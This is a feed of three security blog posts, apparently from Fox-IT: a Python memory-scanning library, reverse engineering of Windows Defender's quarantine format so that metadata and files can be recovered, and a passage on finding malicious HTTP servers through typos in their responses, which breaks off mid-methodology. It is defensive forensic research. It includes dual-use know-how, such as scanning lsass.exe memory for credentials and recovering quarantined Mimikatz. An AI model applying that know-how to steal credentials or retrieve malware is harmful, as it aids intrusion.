Reading view

There are new articles available, click to refresh the page.

Memory Scanning for the Masses

Authors: Axel Boesenach and Erik Schamper

In this blog post we will go into a user-friendly memory scanning Python library that was created out of the necessity of having more control during memory scanning. We will give an overview of how this library works, share the thought process and the why’s. This blog post will not cover the inner workings of the memory management of the respective platforms.

Memory scanning

Memory scanning is the practice of iterating over the different processes running on a computer system and searching through their memory regions for a specific pattern. There can be a myriad of reasons to scan the memory of certain processes. The most common use cases are probably credential access (accessing the memory of the lsass.exe process for example), scanning for possible traces of malware and implants or recovery of interesting data, such as cryptographic material.

If time is as valuable to you as it is to us at Fox-IT, you probably noticed that performing a full memory scan looking for a pattern is a very time-consuming process, to say the least.

Why is scanning memory so time consuming when you know what you are looking for, and more importantly; how can this scanning process be sped up? While looking into different detection techniques to identify running Cobalt Strike beacons, we noticed something we could easily filter on, speeding up our scanning processes: memory attributes.

Speed up scanning with memory attributes

Memory attributes are comparable to the permission system we all know and love on our regular file and directory structures. The permission system dictates what kind of actions are allowed within a specific memory region and can be changed to different sets of attributes by their respective API calls.

The following memory attributes exist on both the Windows and UNIX platforms:

  • Read (R)
  • Write (W)
  • Execute (E)

The Windows platform has some extra permission attributes, plus quite an extensive list of allocation1 and protection2 attributes. These attributes can also be used to filter when looking for specific patterns within memory regions but are not important to go into right now.

So how do we leverage this information about attributes to speed up our scanning processes? It turns out that by filtering the regions to scan based on the memory attributes set for the regions, we can speed up our scanning process tremendously before even starting to look for our specified patterns.

Say for example we are looking for a specific byte pattern of an implant that is present in a certain memory region of a running process on the Windows platform. We already know what pattern we are looking for and we also know that the memory regions used by this specific implant are always set to:

TypeProtectionInitial
PRVERWERW
Table 1. Example of implant memory attributes that are set

Depending on what is running on the system, filtering on the above memory attributes already rules out a large portion of memory regions for most running processes on a Windows system.

If we take a notepad.exe process as an example, we can see that the different sections of the executable have their respective rights. The .text section of an executable contains executable code and is thus marked with the E permission as its protection:

If we were looking for just the sections and regions that are marked as being executable, we would only need to scan the .text section of the notepad.exe process. If we scan all the regions of every running process on the system, disregarding the memory attributes which are set, scanning for a pattern will take quite a bit longer.

Introducing Skrapa

We’ve incorporated the techniques described above into an easy to install Python package. The package is designed and tested to work on Linux and Microsoft Windows systems. Some of the notable features include:

  • Configurable scanning:
    • Scan all the process memory, specific processes by name or process identifier.
  • Regex and YARA support.
  • Support for user callback functions, define custom functions that execute routines when user specified conditions are met.
  • Easy to incorporate in bigger projects and scripts due to easy to use API.

The package was designed to be easily extensible by the end users, providing an API that can be leveraged to perform more.

Where to find Skrapa?

The Python library is available on our GitHub, together with some examples showing scenarios on how to use it.

GitHub: https://github.com/fox-it/skrapa

References

  1. https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc ↩
  2. https://learn.microsoft.com/en-us/windows/win32/Memory/memory-protection-constants ↩

Reverse, Reveal, Recover: Windows Defender Quarantine Forensics

Max Groot & Erik Schamper

TL;DR

  • Windows Defender (the antivirus shipped with standard installations of Windows) places malicious files into quarantine upon detection.
  • Reverse engineering mpengine.dll resulted in finding previously undocumented metadata in the Windows Defender quarantine folder that can be used for digital forensics and incident response.
  • Existing scripts that extract quarantined files do not process this metadata, even though it could be useful for analysis.
  • Fox-IT’s open-source digital forensics and incident response framework Dissect can now recover this metadata, in addition to recovering quarantined files from the Windows Defender quarantine folder.
  • dissect.cstruct allows us to use C-like structure definitions in Python, which enables easy continued research in other programming languages or reverse engineering in tools like IDA Pro.
    • Want to continue in IDA Pro? Just copy & paste the structure definitions!

Introduction

During incident response engagements we often encounter antivirus applications that have rightfully triggered on malicious software that was deployed by threat actors. Most commonly we encounter this for Windows Defender, the antivirus solution that is shipped by default with Microsoft Windows. Windows Defender places malicious files in quarantine upon detection, so that the end user may decide to recover the file or delete it permanently. Threat actors, when faced with the detection capabilities of Defender, either disable the antivirus in its entirety or attempt to evade its detection.

The Windows Defender quarantine folder is valuable from the perspective of digital forensics and incident response (DFIR). First of all, it can reveal information about timestamps, locations and signatures of files that were detected by Windows Defender. Especially in scenarios where the threat actor has deleted the Windows Event logs, but left the quarantine folder intact, the quarantine folder is of great forensic value. Moreover, as the entire file is quarantined (so that the end user may choose to restore it), it is possible to recover files from quarantine for further reverse engineering and analysis.

While scripts already exist to recover files from the Defender quarantine folder, the purpose of much of the contents of this folder were previously unknown. We don’t like big unknowns, so we performed further research into the previously unknown metadata to see if we could uncover additional forensic traces.

Rather than just presenting our results, we’ve structured this blog to also describe the process to how we got there. Skip to the end if you are interested in the results rather than the technical details of reverse engineering Windows Defender.

Diving into Windows Defender internals

Existing Research

We started by looking into existing research into the internals of Windows Defender. The most extensive documentation we could find on the structures of Windows Defender quarantine files was Florian Bauchs’ whitepaper analyzing antivirus software quarantine files, but we also looked at several scripts on GitHub.

  • In summary, whenever Defender puts a file into quarantine, it does three things:
    A bunch of metadata pertaining to when, why and how the file was quarantined is held in a QuarantineEntry. This QuarantineEntry is RC4-encrypted and saved to disk in the /ProgramData/Microsoft/Windows Defender/Quarantine/Entries folder.
  • The contents of the malicious file is stored in a QuarantineEntryResourceData file, which is also RC4-encrypted and saved to disk in the /ProgramData/Microsoft/Windows Defender/Quarantine/ResourceData folder.
  • Within the /ProgramData/Microsoft/Windows Defender/Quarantine/Resource folder, a Resource file is made. Both from previous research as well as from our own findings during reverse engineering, it appears this file contains no information that cannot be obtained from the QuarantineEntry and the QuarantineEntryResourceData files. Therefore, we ignore the Resource file for the remainder of this blog.

While previous scripts are able to recover some properties from the ResourceData and QuarantineEntry files, large segments of data were left unparsed, which gave us a hunch that additional forensic artefacts were yet to be discovered.

Windows Defender encrypts both the QuarantineEntry and the ResourceData files using a hardcoded RC4 key defined in mpengine.dll. This hardcoded key was initially published by Cuckoo and is paramount for the offline recovery of the quarantine folder.

Pivotting off of public scripts and Bauch’s whitepaper, we loaded mpengine.dll into IDA to further review how Windows Defender places a file into quarantine. Using the PDB available from the Microsoft symbol server, we get a head start with some functions and structures already defined.

Recovering metadata by investigating the QuarantineEntry file

Let us begin with the QuarantineEntry file. From this file, we would like to recover as much of the QuarantineEntry structure as possible, as this holds all kinds of valuable metadata. The QuarantineEntry file is not encrypted as one RC4 cipherstream, but consists of three chunks that are each individually encrypted using RC4.

These three chunks are what we have come to call QuarantineEntryFileHeader, QuarantineEntrySection1 and QuarantineEntrySection2.

  • QuarantineEntryFileHeader describes the size of QuarantineEntrySection1 and QuarantineEntrySection2, and contains CRC checksums for both sections.
  • QuarantineEntrySection1 contains valuable metadata that applies to all QuarantineEntryResource instances within this QuarantineEntry file, such as the DetectionName and the ScanId associated with the quarantine action.
  • QuarantineEntrySection2 denotes the length and offset of every QuarantineEntryResource instance within this QuarantineEntry file so that they can be correctly parsed individually.

A QuarantineEntry has one or more QuarantineEntryResource instances associated with it. This contains additional information such as the path of the quarantined artefact, and the type of artefact that has been quarantined (e.g. regkey or file).

An overview of the different structures within QuarantineEntry is provided in Figure 1:

upload_55de55932e8d2b42e392875c9982dfb5
Figure 1: An example overview of a QuarantineEntry. In this example, two files were simultaneously quarantined by Windows Defender. Hence, there are two QuarantineEntryResource structures contained within this single QuarantineEntry.

As QuarantineEntryFileHeader is mostly a structure that describes how QuarantineEntrySection1 and QuarantineEntrySection2 should be parsed, we will first look into what those two consist of.

QuarantineEntrySection1

When reviewing mpengine.dll within IDA, the contents of both QuarantineEntrySection1 and QuarantineEntrySection2 appear to be determined in the
QexQuarantine::CQexQuaEntry::Commit function.

The function receives an instance of the QexQuarantine::CQexQuaEntry class. Unfortunately, the PDB file that Microsoft provides for mpengine.dll does not contain contents for this structure. Most fields could, however, be derived using the function names in the PDB that are associated with the CQexQuaEntry class:

upload_5238619cbda300bf7ebb129b3a592985
Figure 2: Functions retrieving properties from QuarantineEntry

The Id, ScanId, ThreatId, ThreatName and Time fields are most important, as these will be written to the QuarantineEntry file.

At the start of the QexQuarantine::CQexQuaEntry::Commit function, the size of Section1 is determined.

upload_a6065a0a572b7fd2230d23c07ce25c02
Figure 3: Reviewing the decompiled output of CqExQuaEntry::Commit shows the size of QuarantineEntrySection1 being set to thre length of ThreatName plus 53.

This sets section1_size to a value of the length of the ThreatName variable plus 53. We can determine what these additional 53 bytes consist of by looking at what values are set in the QexQuarantine::CQexQuaEntry::Commit function for the Section1 buffer.

This took some experimentation and required trying different fields, offsets and sizes for the QuarantineEntrySection1 structure within IDA. After every change, we would review what these changes would do to the decompiled IDA view of the QexQuarantine::CQexQuaEntry::Commit function.

Some trial and error landed us the following structure definition:

struct QuarantineEntrySection1 {
CHAR Id[16];
CHAR ScanId[16];
QWORD Timestamp;
QWORD ThreatId;
DWORD One;
CHAR DetectionName[];
};
view raw defender-1.c hosted with ❤ by GitHub

While reviewing the final decompiled output (right) for the assembly code (left), we noticed a field always being set to 1:

upload_fd8ee20d24251cb21ef29720c1b2a3a8
Figure 4: A field of QuarantineEntrySection1 always being set to the value of 1.

Given that we do not know what this field is used for, we opted to name the field ‘One’ for now. Most likely, it’s a boolean value that is always true within the context of the QexQuarantine::CQexQuaEntry::Commit commit function.

QuarantineEntrySection2

Now that we have a structure definition for the first section of a QuarantineEntry, we now move on to the second part. QuarantineEntrySection2 holds the number of QuarantineEntryResource objects confined within a QuarantineEntry, as well as the offsets into the QuarantineEntry structure where they are located.

In most scenarios, one threat gets detected at a time, and one QuarantineEntry will be associated with one QuarantineEntryResource. This is not always the case: for example, if one unpacks a ZIP folder that contains multiple malicious files, Windows Defender might place them all into quarantine. Each individual malicious file of the ZIP would then be one QuarantineEntryResource, but they are all confined within one QuarantineEntry.

QuarantineEntryResource

To be able to parse QuarantineEntryResource instances, we look into the CQexQuaResource::ToBinary function. This function receives a QuarantineEntryResource object, as well as a pointer to a buffer to which it needs to write the binary output to. If we can reverse the logic within this function, we can convert the binary output back into a parsed instance during forensic recovery.

Looking into the CQexQuaResource::ToBinary function, we see two very similar loops as to what was observed before for serializing the ThreatName of QuarantineEntrySection1. By reviewing various decrypted QuarantineEntry files, it quickly became apparent that these loops are responsible for reserving space in the output buffer for DetectionPath and DetectionType, with DetectionPath being UTF-16 encoded:

upload_2673150155ac8022e30f0a5819615b59
Figure 5: Reservation of space for DetectionPath and DetectionType at the beginning of CQexQuaResource::ToBinary

Fields

When reviewing the QexQuarantine::CQexQuaEntry::Commit function, we observed an interesting loop that (after investigating function calls and renaming variables) explains the data that is stored between the DetectionType and DetectionPath:

upload_abea0cbdffa486b1db6ee9440caf85d5
Figure 6: Alignment logic for serializing Fields

It appears QuarantineEntryResource structures have one or more QuarantineResourceField instances associated with them, with the number of fields associated with a QuarantineEntryResource being stored in a single byte in between the DetectionPath and DetectionType. When saving the QuarantineEntry to disk, fields have an alignment of 4 bytes. We could not find mentions of QuarantineEntryResourceField structures in prior Windows Defender research, even though they can hold valuable information.

The CQExQuaResource class has several different implementations of AddField, accepting different kinds of parameters. Reviewing these functions showed that fields have an Identifier, Type, and a buffer Data with a size of Size, resulting in a simple TLV-like format:

struct QuarantineEntryResourceField {
WORD Size;
WORD Identifier:12;
FIELD_TYPE Type:4;
CHAR Data[Size];
};
view raw defender-2.c hosted with ❤ by GitHub

To understand what kinds of types and identifiers are possible, we delve further into the different versions of the AddField functions, which all accept a different data type:

upload_e3940f49457a6a21316e894c863cedf3
Figure 7: Finding different field types based on different implementations of the CqExQuaResource::AddField function

Visiting these functions, we reviewed the Type and Size variables to understand the different possible types of fields that can be set for QuarantineResource instances. This yields the following FIELD_TYPE enum:

enum FIELD_TYPE : WORD {
STRING = 0x1,
WSTRING = 0x2,
DWORD = 0x3,
RESOURCE_DATA = 0x4,
BYTES = 0x5,
QWORD = 0x6,
};
view raw defender-3.c hosted with ❤ by GitHub

As the AddField functions are part of a virtual function table (vtable) of the CQexQuaResource class, we cannot trivially find all places where the AddField function is called, as they are not directly called (which would yield an xref in IDA). Therefore, we have not exhausted all code paths leading to a call of AddField to identify all possible Identifier values and how they are used. Our research yielded the following field identifiers as the most commonly observed, and of the most forensic value:

enum FIELD_IDENTIFIER : WORD {
CQuaResDataID_File = 0x02,
CQuaResDataID_Registry = 0x03,
Flags = 0x0A,
PhysicalPath = 0x0C,
DetectionContext = 0x0D,
Unknown = 0x0E,
CreationTime = 0x0F,
LastAccessTime = 0x10,
LastWriteTime = 0x11,
};
view raw defender-4.c hosted with ❤ by GitHub

Especially CreationTime, LastAccessTime and LastWriteTime can provide crucial data points during an investigation.

Revisiting the QuarantineEntrySection2 and QuarantineEntryResource structures

Now that we have an understanding of how fields work and how they are stored within the QuarantineEntryResource, we can derive the following structure for it:

struct QuarantineEntryResource {
WCHAR DetectionPath[];
WORD FieldCount;
CHAR DetectionType[];
};
view raw defender-5.c hosted with ❤ by GitHub

Revisiting the QexQuarantine::CQexQuaEntry::Commit function, we can now understand how this function determines at which offset every QuarantineEntryResource is located within QuarantineEntry. Using these offsets, we will later be able to parse individual QuarantineEntryResource instances. Thus, the QuarantineEntrySection2 structure is fairly straightforward:

struct QuarantineEntrySection2 {
DWORD EntryCount;
DWORD EntryOffsets[EntryCount];
};
view raw defender-6.c hosted with ❤ by GitHub

The last step for recovery of QuarantineEntry: the QuarantineEntryFileHeader

Now that we have a proper understanding of the QuarantineEntry, we want to know how it ends up written to disk in encrypted form, so that we can properly parse the file upon forensic recovery. By inspecting the QexQuarantine::CQexQuaEntry::Commit function further, we can find how this ends up passing QuarantineSection1 and QuarantineSection2 to a function named CUserDatabase::Add.

We noted earlier that the QuarantineEntry contains three RC4-encrypted chunks. The first chunk of the file is created in the CUserDatabase::Add function, and is the QuarantineEntryHeader. The second chunk is QuarantineEntrySection1. The third chunk starts with QuarantineEntrySection2, followed by all QuarantineEntryResource structures and their 4-byte aligned QuarantineEntryResourceField structures.

We knew from Bauch’s work that the QuarantineEntryFileHeader has a static size of 60 bytes, and contains the size of QuarantineEntrySection1 and QuarantineEntrySection2. Thus, we need to decrypt the QuarantineEntryFileHeader first.

Based on Bauch’s work, we started with the following structure for QuarantineEntryFileHeader:

struct QuarantineEntryHeader {
char magic[16];
char unknown1[24];
uint32_t section1_size;
uint32_t section2_size;
char unknown[12];
};
view raw defender-7.c hosted with ❤ by GitHub

That leaves quite some bytes unknown though, so we went back to trusty IDA. Inspecting the CUserDatabase:Add function helps us further understand the QuarantineEntryHeader structure. For example, we can see the hardcoded magic header and footer:

upload_98b8e4a53c747b0e1a87190ef49328a3
Figure 8: Magic header and footer being set for the QuarantineEntryHeader

A CRC checksum calculation can be seen for both the buffer of QuarantineEntrySection1 and QuarantineSection2:

upload_1a2abe99ea699e4305c04f708fb8905d
Figure 9: CRC Checksum logic within CUserDatabase::Add

These checksums can be used upon recovery to verify the validity of the file. The CUserDatabase:Add function then writes the three chunks in RC4-encrypted form to the QuarantineEntry file buffer.

Based on these findings of the Magic header and footer and the CRC checksums, we can revise the structure definition for the QuarantineEntryFileHeader:

struct QuarantineEntryFileHeader {
CHAR MagicHeader[4];
CHAR Unknown[4];
CHAR _Padding[32];
DWORD Section1Size;
DWORD Section2Size;
DWORD Section1CRC;
DWORD Section2CRC;
CHAR MagicFooter[4];
};
view raw defender-8.c hosted with ❤ by GitHub

This was the last piece to be able to parse QuarantineEntry structures from their on-disk form. However, we do not want just the metadata: we want to recover the quarantined files as well.

Recovering files by investigating QuarantineEntryResourceData

We can now correctly parse QuarantineEntry files, so it is time to turn our attention to the QuarantineEntryResourceData file. This file contains the RC4-encrypted contents of the file that has been placed into quarantine.

Step one: eyeball hexdumps

Let’s start by letting Windows Defender quarantine a Mimikatz executable and reviewing its output files in the quarantine folder. One would think that merely RC4 decrypting the QuarantineEntryResourceData file would result in the contents of the original file. However, a quick hexdump of a decrypted QuarantineEntryResourceData file shows us that there is more information contained within:

max@dissect $ hexdump -C mimikatz_resourcedata_rc4_decrypted.bin | head -n 20
00000000 03 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 |…………….|
00000010 00 00 00 00 01 00 04 80 14 00 00 00 30 00 00 00 |…………0…|
00000020 00 00 00 00 4c 00 00 00 01 05 00 00 00 00 00 05 |….L………..|
00000030 15 00 00 00 a4 14 d2 9b 1a 02 a7 4f 07 f6 37 b4 |………..O..7.|
00000040 e8 03 00 00 01 05 00 00 00 00 00 05 15 00 00 00 |…………….|
00000050 a4 14 d2 9b 1a 02 a7 4f 07 f6 37 b4 01 02 00 00 |…….O..7…..|
00000060 02 00 58 00 03 00 00 00 00 00 14 00 ff 01 1f 00 |..X………….|
00000070 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 |…………….|
00000080 ff 01 1f 00 01 02 00 00 00 00 00 05 20 00 00 00 |………… …|
00000090 20 02 00 00 00 00 24 00 ff 01 1f 00 01 05 00 00 | …..$………|
000000a0 00 00 00 05 15 00 00 00 a4 14 d2 9b 1a 02 a7 4f |……………O|
000000b0 07 f6 37 b4 e8 03 00 00 01 00 00 00 00 00 00 00 |..7………….|
000000c0 00 ae 14 00 00 00 00 00 00 00 00 00 4d 5a 90 00 |…………MZ..|
000000d0 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 |…………….|
000000e0 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 |….@………..|
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |…………….|
00000100 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e |…….. …….|
00000110 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 |….!..L.!This p|
00000120 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 |rogram cannot be|
00000130 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 | run in DOS mode|
view raw defender-hex-1 hosted with ❤ by GitHub

As visible in the hexdump, the MZ value (which is located at the beginning of the buffer of the Mimikatz executable) only starts at offset 0xCC. This gives reason to believe there is potentially valuable information preceding it.

There is also additional information at the end of the ResourceData file:

max@dissect $ hexdump -C mimikatz_resourcedata_rc4_decrypted.bin | tail -n 10
0014aed0 00 00 00 00 52 00 00 00 00 00 00 00 2c 00 00 00 |….R…….,…|
0014aee0 3a 00 5a 00 6f 00 6e 00 65 00 2e 00 49 00 64 00 |:.Z.o.n.e…I.d.|
0014aef0 65 00 6e 00 74 00 69 00 66 00 69 00 65 00 72 00 |e.n.t.i.f.i.e.r.|
0014af00 3a 00 24 00 44 00 41 00 54 00 41 00 5b 5a 6f 6e |:.$.D.A.T.A.[Zon|
0014af10 65 54 72 61 6e 73 66 65 72 5d 0d 0a 5a 6f 6e 65 |eTransfer]..Zone|
0014af20 49 64 3d 33 0d 0a 52 65 66 65 72 72 65 72 55 72 |Id=3..ReferrerUr|
0014af30 6c 3d 43 3a 5c 55 73 65 72 73 5c 75 73 65 72 5c |l=C:\Users\user\|
0014af40 44 6f 77 6e 6c 6f 61 64 73 5c 6d 69 6d 69 6b 61 |Downloads\mimika|
0014af50 74 7a 5f 74 72 75 6e 6b 2e 7a 69 70 0d 0a |tz_trunk.zip..|
view raw defender-hex-2 hosted with ❤ by GitHub

At the end of the hexdump, we see an additional buffer, which some may recognize as the “Zone Identifier”, or the “Mark of the Web”. As this Zone Identifier may tell you something about where a file originally came from, it is valuable for forensic investigations.

Step two: open IDA

To understand where these additional buffers come from and how we can parse them, we again dive into the bowels of mpengine.dll. If we review the QuarantineFile function, we see that it receives a QuarantineEntryResource and QuarantineEntry as parameters. When following the code path, we see that the BackupRead function is called to write to a buffer of which we know that it will later be RC4-encrypted by Defender and written to the quarantine folder:

upload_a5cf05e6acd61d331963cd4c3ef9f95a
Figure 10: BackupRead being called withi nthe QuarantineFile function.

Step three: RTFM

A glance at the documentation of BackupRead reveals that this function returns a buffer seperated by Win32 stream IDs. The streams stored by BackupRead contain all data streams as well as security data about the owner and permissions of a file. On NTFS file systems, a file can have multiple data attributes or streams: the “main” unnamed data stream and optionally other named data streams, often referred to as “alternate data streams”. For example, the Zone Identifier is stored in a seperate Zone.Identifier data stream of a file. It makes sense that a function intended for backing up data preserves these alternate data streams as well.

The fact that BackupRead preserves these streams is also good news for forensic analysis. First of all, malicious payloads can be hidden in alternate data streams. Moreover, alternate datastreams such as the Zone Identifier and the security data can help to understand where a file has come from and what it contains. We just need to recover the streams as they have been saved by BackupRead!

Diving into IDA is not necessary, as the documentation tells us all that we need. For each data stream, the BackupRead function writes a WIN32_STREAM_ID to disk, which denotes (among other things) the size of the stream. Afterwards, it writes the data of the stream to the destination file and continues to the next stream. The WIN32_STREAM_ID structure definition is documented on the Microsoft Learn website:

typedef struct _WIN32_STREAM_ID {
STREAM_ID StreamId;
STREAM_ATTRIBUTES StreamAttributes;
QWORD Size;
DWORD StreamNameSize;
WCHAR StreamName[StreamNameSize / 2];
} WIN32_STREAM_ID;
view raw defender-9.c hosted with ❤ by GitHub

Who slipped this by the code review?

While reversing parts of mpengine.dll, we came across an interesting looking call in the HandleThreatDetection function. We appreciate that threats must be dealt with swiftly and with utmost discipline, but could not help but laugh at the curious choice of words when it came to naming this particular function.
upload_f98fac728a52164d573769c06a18b18f
Figure 11: A function call to SendThreatToCamp, a ‘call’ to action that seems pretty harsh.

Implementing our findings into Dissect

We now have all structure definitions that we need to recover all metadata and quarantined files from the quarantine folder. There is only one step left: writing an implementation.

During incident response, we do not want to rely on scripts scattered across home directories and git repositories. This is why we integrate our research into Dissect.

We can leave all the boring stuff of parsing disks, volumes and evidence containers to Dissect, and write our implementation as a plugin to the framework. Thus, the only thing we need to do is parse the artefacts and feed the results back into the framework.

The dive into Windows Defender of the previous sections resulted in a number of structure definitions that we need to recover data from the Windows Defender quarantine folder. When making an implementation, we want our code to reflect these structure definitions as closely as possible, to make our code both readable and verifiable. This is where dissect.cstruct comes in. It can parse structure definitions and make them available in your Python code. This removes a lot of boilerplate code for parsing structures and greatly enhances the readability of your parser. Let’s review how easily we can parse a QuarantineEntry file using dissect.cstruct :

from dissect.cstruct import cstruct
defender_def= """
struct QuarantineEntryFileHeader {
CHAR MagicHeader[4];
CHAR Unknown[4];
CHAR _Padding[32];
DWORD Section1Size;
DWORD Section2Size;
DWORD Section1CRC;
DWORD Section2CRC;
CHAR MagicFooter[4];
};
struct QuarantineEntrySection1 {
CHAR Id[16];
CHAR ScanId[16];
QWORD Timestamp;
QWORD ThreatId;
DWORD One;
CHAR DetectionName[];
};
struct QuarantineEntrySection2 {
DWORD EntryCount;
DWORD EntryOffsets[EntryCount];
};
struct QuarantineEntryResource {
WCHAR DetectionPath[];
WORD FieldCount;
CHAR DetectionType[];
};
struct QuarantineEntryResourceField {
WORD Size;
WORD Identifier:12;
FIELD_TYPE Type:4;
CHAR Data[Size];
};
"""
c_defender = cstruct()
c_defender.load(defender_def)
class QuarantineEntry:
def __init__(self, fh: BinaryIO):
# Decrypt & parse the header so that we know the section sizes
self.header = c_defender.QuarantineEntryFileHeader(rc4_crypt(fh.read(60)))
# Decrypt & parse Section 1. This will tell us some information about this quarantine entry.
# These properties are shared for all quarantine entry resources associated with this quarantine entry.
self.metadata = c_defender.QuarantineEntrySection1(rc4_crypt(fh.read(self.header.Section1Size)))
# […]
# The second section contains the number of quarantine entry resources contained in this quarantine entry,
# as well as their offsets. After that, the individal quarantine entry resources start.
resource_buf = BytesIO(rc4_crypt(fh.read(self.header.Section2Size)))
view raw defender.py hosted with ❤ by GitHub

As you can see, when the structure format is known, parsing it is trivial using dissect.cstruct. The only caveat is that the QuarantineEntryFileHeader, QuarantineEntrySection1 and QuarantineEntrySection2 structures are individually encrypted using the hardcoded RC4 key. Because only the size of QuarantineEntryFileHeader is static (60 bytes), we parse that first and use the information contained in it to decrypt the other sections.

To parse the individual fields contained within the QuarantineEntryResource, we have to do a bit more work. We cannot add the QuarantineEntryResourceField directly to the QuarantineEntryResource structure definition within dissect.cstruct, as it currently does not support the type of alignment used by Windows Defender. However, it does support the QuarantineEntryResourceField structure definition, so all we have to do is follow the alignment logic that we saw in IDA:

# As the fields are aligned, we need to parse them individually
offset = fh.tell()
for _ in range(field_count):
# Align
offset = (offset + 3) & 0xFFFFFFFC
fh.seek(offset)
# Parse
field = c_defender.QuarantineEntryResourceField(fh)
self._add_field(field)
# Move pointer
offset += 4 + field.Size

We can use dissect.cstruct‘s dumpstruct function to visualize our parsing to verify if we are correctly loading in all data:

upload_193c111d8639e63369484615023e25e8

And just like that, our parsing is done. Utilizing dissect.cstruct makes parsing structures much easier to understand and implement. This also facilitates rapid iteration: we have altered our structure definitions dozens of times during our research, which would have been pure pain without having the ability to blindly copy-paste structure definitions into our Python editor of choice.

Implementing the parser within the Dissect framework brings great advantages. We do not have to worry at all about the format in which the forensic evidence is provided. Implementing the Defender recovery as a Dissect plugin means it just works on standard forensic evidence formats such as E01 or ASDF, or against forensic packages the like of KAPE and Acquire, and even on a live virtual machine:

max@dissect $ target-query ~/Windows10.vmx -q -f defender.quarantine
<filesystem/windows/defender/quarantine/file hostname='DESKTOP-AR98HFK' domain=None ts=2022-11-22 09:37:16.536575+00:00 quarantine_id=b'\xe3\xc1\x03\x80\x00\x00\x00\x003\x12]]\x07\x9a\xd2\xc9' scan_id=b'\x88\x82\x89\xf5?\x9e J\xa5\xa8\x90\xd0\x80\x96\x80\x9b' threat_id=2147729891 detection_type='file' detection_name='HackTool:Win32/Mimikatz.D' detection_path='C:\\Users\\user\\Documents\\mimikatz.exe' creation_time=2022-11-22 09:37:00.115273+00:00 last_write_time=2022-11-22 09:37:00.240202+00:00 last_accessed_time=2022-11-22 09:37:08.081676+00:00 resource_id='9EC21BB792E253DBDC2E88B6B180C4E048847EF6'>
max@dissect $ target-query ~/Windows10.vmx -f defender.recover -o /tmp/ -v
2023-02-14T07:10:20.335202Z [info] <Target /home/max/Windows10.vmx>: Saving /tmp/9EC21BB792E253DBDC2E88B6B180C4E048847EF6.security_descriptor [dissect.target.target]
2023-02-14T07:10:20.335898Z [info <Target /home/max/Windows10.vmx>: Saving /tmp/9EC21BB792E253DBDC2E88B6B180C4E048847EF6 [dissect.target.target]
2023-02-14T07:10:20.337956Z [info] <Target /home/max/Windows10.vmx>: Saving /tmp/9EC21BB792E253DBDC2E88B6B180C4E048847EF6.ZoneIdentifierDATA [dissect.target.target]
view raw defender-query hosted with ❤ by GitHub

The full implementation of Windows Defender quarantine recovery can be observed on Github.

Conclusion

We hope to have shown that there can be great benefits to reverse engineering the internals of Microsoft Windows to discover forensic artifacts. By reverse engineering mpengine.dll, we were able to further understand how Windows Defender places detected files into quarantine. We could then use this knowledge to discover (meta)data that was previously not fully documented or understood. The main results of this are the recovery of more information about the original quarantined file, such as various timestamps and additional NTFS data streams, like the Zone.Identifier, which is information that can be useful in digital forensics or incident response investigations.

The documentation of QuarantineEntryResourceField was not available prior to this research and we hope others can use this to further investigate which fields are yet to be discovered. We have also documented how the BackupRead functionality is used by Defender to preserve the different data streams present in the NTFS file, including the Zone Identifier and Security Descriptor.

When writing our parser, using dissect.cstruct allowed us to tightly integrate our findings of reverse engineering in our parsing, enhancing the readability and verifiability of the code. This can in turn help others to pivot off of our research, just like we did when pivotting off of the research of others into the Windows Defender quarantine folder.

This research has been implemented as a plugin for the Dissect framework. This means that our parser can operate independently of the type of evidence it is being run against. This functionality has been added to dissect.target as of January 2nd 2023 and is installed with Dissect as of version 3.4.

The Spelling Police: Searching for Malicious HTTP Servers by Identifying Typos in HTTP Responses

Authored by Margit Hazenbroek

At Fox-IT (part of NCC Group) identifying servers that host nefarious activities is a critical aspect of our threat intelligence. One approach involves looking for anomalies in responses of HTTP servers. Sometimes cybercriminals that host malicious servers employ tactics that involve mimicking the responses of legitimate software to evade detection. However, a common pitfall of these malicious actors are typos, which we use as unique fingerprints to identify such servers. For example, we have used a simple extraneous whitespace in HTTP responses as a fingerprint to identify servers that were hosting Cobalt Strike with high confidence1. In fact, we have created numerous fingerprints based on textual slipups in HTTP responses of malicious servers, highlighting how fingerprinting these servers can be a matter of a simple mistake.

HTTP servers are expected to follow the established RFC guidelines of HTTP, producing consistent HTTP responses in accordance with standardized protocols. HTTP responses that are not set up properly can have an impact on the safety and security of websites and web services. With these considerations in mind, we decided to research the possibility of identifying unknown malicious servers by proactively searching for textual errors in HTTP responses.

In this blog post, we delve into this research, titled “The Spelling Police,” which aims to identify malevolent servers through the detection of typos in HTTP responses. Before we go into the methodology, we provide a brief overview of HTTP response headers and semantics. Then we explain how we spotted the spelling errors, focusing on the Levenshtein distance, a way to measure the differences between the expected and actual responses. Our preliminary research suggests that mistakes in HTTP responses are surprisingly common, even among legitimate servers. This finding suggests that typos alone are not enough to confirm malicious intent. However, we maintain that typos in HTTP response headers can be indicative of malicious servers, particularly when combined with other suspicious indicators.

HTTP response headers and semantics

HTTP is a protocol that governs communication between web servers and clients2. Typically, a client, such as a web browser, sends a request to a server to achieve specific goals, such as requesting to view a webpage. The server receives and processes these requests, then sends back corresponding responses. The client subsequently interprets the message semantics of these responses, for example by rendering the HTML in an HTTP response (see example 1).

Example 1: HTTP request and response

An HTTP response includes the status code and status line that provide information on how the server is responding, such as a ‘404 Page Not Found’ message. This status code is followed by response headers. Response headers are key:value pairs as described in the RFC that allow the server to give more information for context about the response and it can give information to the client on how to process the received data. Ensuring appropriate implementation of HTTP response headers plays a crucial role in preventing security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure, and many others34

Example 2: HTTP response

Methodology

The purpose of this research is to identify textual deviations in HTTP response headers and verify the servers behind them to detect new or unknown malicious servers. To accomplish this, we collected a large sample of HTTP responses and applied a spelling-checking model to flag any anomalous responses that contained deviations (see example 3 for an overview of the pipeline). These anomalous HTTP responses were further investigated to determine if they were originating from potentially malicious servers.

Example 3: Steps taken to get a list of anomalous HTTP responses

Data: Batch of HTTP responses
